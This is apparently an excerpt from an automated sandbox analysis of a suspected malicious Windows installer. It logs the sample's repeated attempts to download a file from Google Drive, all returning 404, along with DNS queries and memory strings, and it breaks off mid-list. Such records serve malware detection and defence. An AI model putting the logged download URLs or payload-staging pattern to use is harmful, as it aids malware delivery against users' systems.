      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4AGVAA5_WWVNHbntxDjCPkIOu4s7cmQsXxk7QPYvsNqT9WD6FWjTvEmuyHDoAXwdCWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:05:46 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-unb7a40A_XHPKEdcYKqwdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W; expires=Tue, 17-Jun-2025 17:05:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5AtbLVvDemcsOze4UxWAJswKKU1OOMjEFkiL9uXjR3uk8jeFJCbQcre-BIKMhLeRdaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:02 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-J99k5bv_o8rfN7NTLMxwag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6bPUQknQJR2dLSk1W3xO3cIl_Fhp_FPTg82L3MoHt6MutCEPb0gmAsZ5n-WstE5dvrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:18 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-8lSpDq0z_xTdjpSMhC5onw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41YOb0Gp3cWeY4Rv6wZr2KfNwO8cRr_GaxLXgZUWfKuXKeLUrKpQmvcZ0Ze-ZpUNWZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:34 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-HFAbTqJA7y5bm2pnrujFuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7dQE9ZmoXTY5c_KfSk0aHr0ZXPqHFBVuMQAfqu6FrtHKXwsgmKed4tHol8b7DsOSfGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:06:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-D8mHoRdbOaOXCdzqSs6Dcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC69WkwGn1nrZNVaYLTEDd5enm01Ywf_-Uqvx6me1gA7QE2cqedW5q16lbOxgoqg5bJWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:05 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce--VZf7RBcyyRT2cLW7twrKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7F1E-Zh1ZL9IpsID0C0hWGFdKUkTFt7qdokeUhMYlZatP6iwdr3RuDDBgaMMnQxkWaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:20 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-62BzG4TWsxQvIl69A0r0Sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lUVYmUhluXEdI1vkLA4mMAjB6bKsc1j-RUZ0hN61c68LyRrTPsZsbaDc12QwrmhphContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-PDAiOeofzBXYm-xFOcPkEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC63_ABeOyhN79BUDBkuYyX9zupD_qrJF-zuc8NHo0436bpUwrZQp317f3biZ5zAHer0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:07:52 GMTContent-Security-Policy: script-src 'nonce-iP3oqmutDjyUbAnCZO8YyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67My6R1xBplI3UdqAoeNBkzyR7aa_TDIFl4BxQLhgf3regiMYVCAd6lUatu2MkZrxYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 17:08:07 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-kqs4NCbSAl4Fz1p_SYrTvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: ME-SPC-94.03.60.175.07.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144276351.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754804680.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.00000000070F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=d
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.00000000070F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Rg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Rg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download;
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Rg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=downloadG
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Rg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=downloadeq
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Rg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=downloadider
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/dz
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256232847.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2255968173.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144276351.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754804680.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 